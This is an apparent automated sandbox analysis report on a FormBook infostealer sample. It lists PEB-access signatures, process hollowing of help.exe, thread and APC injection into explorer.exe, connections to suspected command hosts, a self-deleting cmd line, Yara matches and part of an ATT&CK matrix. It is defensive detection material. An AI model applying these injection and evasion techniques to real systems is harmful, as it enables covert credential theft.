          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03653B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03653B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03631B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03631B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03664A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03664A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03638A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03643A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0363AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0365FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0365D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0365D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0362C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0362B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0362B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0364B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0364B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_03644120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0365513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0365513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_03629100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_03629100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_03629100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036B41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0362B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0362B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0362B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036561A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036561A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036A69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0365A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0364C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_03652990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036F1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_036E2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_03640050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_03640050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 5_2_0364A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SX365783909782021.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.vacalinda.com
Source: C:\Windows\explorer.exe Domain query: www.servicesbackyard.com
Source: C:\Windows\explorer.exe Domain query: www.caravansforsalenorthwales.com
Source: C:\Windows\explorer.exe Network Connect: 142.250.180.243 80
Source: C:\Windows\explorer.exe Domain query: www.djspencer.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 168.235.88.209 80
Source: C:\Windows\explorer.exe Network Connect: 159.89.244.183 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\SX365783909782021.exe Section loaded: unknown target: C:\Users\user\Desktop\SX365783909782021.exe protection: execute and read and write
Source: C:\Users\user\Desktop\SX365783909782021.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\SX365783909782021.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Users\user\Desktop\SX365783909782021.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\SX365783909782021.exe Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\SX365783909782021.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\SX365783909782021.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: BB0000
Source: C:\Users\user\Desktop\SX365783909782021.exe Process created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe'
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SX365783909782021.exe'
Source: explorer.exe, 00000003.00000000.214211632.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\SX365783909782021.exe Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Techniques per tactic column (the number after a technique is the signature count shown in the matrix):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Native API 1; Shared Modules 1; At (Linux); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection 512; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
